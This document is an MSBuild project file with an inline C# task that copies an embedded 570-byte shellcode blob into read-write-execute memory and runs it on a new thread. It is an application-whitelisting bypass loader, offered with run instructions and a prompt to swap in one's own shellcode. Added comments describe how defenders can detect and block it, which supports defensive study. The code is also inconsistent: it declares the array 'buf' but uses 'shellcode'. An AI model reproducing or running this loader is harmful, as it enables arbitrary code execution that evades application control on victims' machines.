test.proj
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes shellcode. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
<!-- Save This File And Execute The Above Command -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using System.Runtime.InteropServices;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
/// <summary>
/// MSBuild inline task. The enclosing UsingTask element hands this class to CodeTaskFactory,
/// and the "Hello" target invokes it, so the code below runs inside the msbuild.exe process.
/// Execute() copies an embedded byte array into memory requested as PAGE_EXECUTE_READWRITE
/// and starts a native thread at that address.
/// </summary>
/// <remarks>
/// Defender notes: this pattern is tracked as MITRE ATT&CK T1127.001 (Trusted Developer
/// Utilities Proxy Execution: MSBuild). Useful signals are msbuild.exe building a project file
/// on a host that does not build software or from an unusual parent process, and a private
/// read-write-execute region in msbuild.exe with a thread start address inside it.
/// Application-control policy (WDAC / AppLocker) that blocks msbuild.exe where it is not
/// needed removes the host binary this task depends on.
/// </remarks>
public class ClassExample : Task, ITask
{
// Win32 allocation type and page protection passed to VirtualAlloc below.
// PAGE_EXECUTE_READWRITE (0x40) makes the region writable and executable at the same time.
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
// P/Invoke declarations into kernel32: these three imports are the only native calls the
// class makes, and each one is resolved from the msbuild.exe process.
[DllImport("kernel32")]
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32")]
private static extern IntPtr CreateThread(
UInt32 lpThreadAttributes,
UInt32 dwStackSize,
UInt32 lpStartAddress,
IntPtr param,
UInt32 dwCreationFlags,
ref UInt32 lpThreadId
);
[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(
IntPtr hHandle,
UInt32 dwMilliseconds
);
/// <summary>
/// Task entry point called by MSBuild: allocates executable memory, copies a byte array
/// into it, runs it on a new thread and waits for that thread.
/// </summary>
/// <returns>Always <c>true</c>; the results of VirtualAlloc and CreateThread are not checked.</returns>
public override bool Execute()
{
//replace with your own shellcode
// Opaque 570-byte blob of machine code embedded in the project file; its content is not
// analysed here and should be treated as untrusted. Large hex byte arrays inside a
// CDATA code section of a project file are a practical static-scanning indicator.
byte[] buf = new byte[570] {0xdd,0xc1,0xba,0x77,0x41,0xc6,
0xc3,0xd9,0x74,0x24,0xf4,0x58,0x33,0xc9,0xb1,0x88,0x83,0xc0,
0x04,0x31,0x50,0x16,0x03,0x50,0x16,0xe2,0x82,0x9a,0x1b,0x1a,
0x18,0x39,0x50,0xc7,0x5f,0xfb,0xa8,0x5a,0x30,0xd7,0x01,0x2b,
0xcc,0xab,0x78,0xb0,0xe1,0xd1,0x6f,0x4a,0xc1,0x05,0xd0,0x16,
0x2e,0xc2,0xe9,0xe5,0xeb,0x43,0x65,0xbf,0x1c,0xde,0xf2,0x01,
0xc4,0x6d,0x2e,0xc7,0x31,0x7d,0xde,0x06,0x13,0x76,0x72,0xdd,
0x2d,0xc9,0x48,0x9a,0xc7,0x46,0xf0,0x07,0x77,0xdd,0xf0,0x9d,
0x89,0xb8,0x85,0x08,0xe8,0x00,0x18,0x33,0x6a,0x0d,0x03,0x7c,
0xd1,0x30,0x3e,0x13,0x8f,0x34,0xed,0x1a,0xd0,0xac,0xbe,0x25,
0x1a,0x47,0xef,0x65,0xeb,0xee,0x81,0xe5,0x34,0x4d,0xd4,0xae,
0xfa,0xd4,0xc8,0x99,0x03,0xe3,0xdb,0xe4,0x26,0xd9,0x0b,0x7a,
0xf2,0x2b,0xa7,0x95,0x75,0x29,0x5c,0x39,0x91,0x64,0xea,0x61,
0xab,0x56,0x58,0xe4,0xd8,0xdc,0x22,0x7a,0x29,0x5b,0x55,0x49,
0xe8,0x8e,0xe7,0x44,0x75,0x43,0x72,0x84,0x92,0xc1,0xf2,0xe9,
0x1e,0xb9,0xa8,0x9a,0x5d,0x03,0x2d,0xa3,0xb6,0x57,0x8c,0x6f,
0xb0,0x3a,0xee,0x9c,0xc9,0xc6,0x34,0x10,0x25,0x99,0x2c,0x31,
0x7f,0x21,0x4c,0x79,0x95,0x00,0xb1,0x31,0xd1,0x50,0xb0,0x59,
0xdf,0xf8,0x7b,0x64,0xd9,0xcf,0x7c,0xe3,0xa5,0x6a,0xb0,0x85,
0xff,0xdc,0x4e,0x82,0xc2,0x67,0x69,0x70,0xbf,0xd3,0xe3,0x22,
0x56,0xdb,0x8d,0x6e,0x0c,0x08,0xef,0xb8,0xef,0x1c,0x85,0xd6,
0xf2,0x33,0xb0,0xee,0x62,0xf4,0x92,0xc3,0xbf,0x06,0xb2,0xfd,
0x91,0xd7,0xdc,0x1c,0x6a,0x1f,0xa6,0xc3,0xe2,0x43,0x2d,0x10,
0xe0,0x8b,0x00,0x8d,0x45,0x83,0x2b,0x34,0x52,0x53,0x9d,0x94,
0x16,0x56,0xba,0x0b,0x00,0x85,0x50,0x44,0xfe,0x7a,0x8b,0xab,
0xd8,0x72,0x22,0x71,0x59,0xf0,0x47,0x72,0xff,0x86,0x1a,0xab,
0xc8,0xe6,0x84,0x12,0xf5,0xca,0x6b,0x73,0x2e,0x9f,0x61,0x46,
0xb9,0xb4,0xd5,0xd1,0x8c,0x57,0x46,0x6a,0xc8,0xfc,0xb4,0x52,
0xd8,0x1a,0x3d,0x98,0x83,0x12,0x74,0x5f,0xc3,0xfd,0xd7,0xf7,
0x35,0xff,0x26,0xa4,0x8c,0x49,0x6c,0xfb,0xa0,0x0b,0x42,0x82,
0x72,0x4b,0xe9,0xc0,0x79,0x54,0xc1,0x06,0x6d,0x38,0x2c,0x94,
0x5b,0xab,0x33,0x55,0xcd,0x5a,0xd2,0x62,0x4d,0x5c,0xbc,0x06,
0x80,0xb4,0xce,0x2c,0x87,0xdf,0x6f,0xc3,0xa4,0x76,0x19,0x76,
0x77,0xf8,0xfb,0xab,0x4d,0x1b,0x3a,0x87,0xf6,0xe7,0xf4,0xa6,
0x5d,0x15,0x12,0x44,0x88,0xc2,0xf5,0xeb,0x6c,0xfb,0x7e,0xd6,
0x1c,0xbd,0xe2,0x94,0xcc,0x35,0x34,0x37,0x55,0x7e,0xc7,0xe5,
0x50,0xe3,0xb9,0xef,0xff,0xf9,0x4a,0xb1,0x4f,0xd9,0x6e,0xf0,
0xfb,0x7d,0x43,0xa3,0xf3,0xa2,0x3c,0x62,0x0e,0x0b,0x5f,0x38,
0x8b,0x04,0x00,0x71,0xcf,0x67,0x10,0x65,0xa8,0xe7,0x32,0xf5,
0x9a,0x30,0x81,0xb1,0x9b,0xbc,0xc2,0x8d,0xbc,0x00,0x48,0xae,
0x0f,0x4c,0x6d,0x01,0x7c,0xdb,0xe7,0x45,0x67,0x1e,0x81,0x7f,
0xab,0x2f,0x5f,0xf2,0x3d,0xea,0xeb,0xcd,0xb7,0x06,0x24,0xa8,
0x49,0x6e,0x24,0x64,0xe2,0x18,0xff,0x93,0x0a,0x5c,0x37,0x0b,
0xca,0xa8,0x7b,0x62,0xd9,0xfa,0x1a,0x52,0xcf,0x10,0x88,0x4a,
0x8b,0x49,0xc1,0xeb,0x19,0x9a,0x40,0x96,0x63,0x11,0xd7,0x83,
0x77,0x7a,0x85,0xa3,0x56,0x4f,0x31,0xfd,0x1b,0x5a,0x81,0x37,
0x50,0xa0,0x37,0xf8,0xf6,0x99,0xe7,0x60,0x86,0x99,0xfd,0xfe,
0x88,0xa6,0xce,0x17,0x40,0xae,0xf4,0x3f,0x9b,0xd4,0xbf,0xb8
};
// Requests a committed region that is writable and executable in one call. A private RWX
// allocation not backed by any image on disk is what memory scanners and EDR look for.
UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// Copies the managed byte array into the native region returned above.
Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
IntPtr pinfo = IntPtr.Zero;
// Starts a thread whose entry point is the allocated region rather than a loaded module;
// thread-creation telemetry with a start address outside any mapped image is a strong signal.
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
// 0xFFFFFFFF is the Win32 INFINITE timeout: the task, and so the msbuild.exe process,
// blocks here until the thread exits, which shows up as an unusually long-lived build.
WaitForSingleObject(hThread, 0xFFFFFFFF);
return true;
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>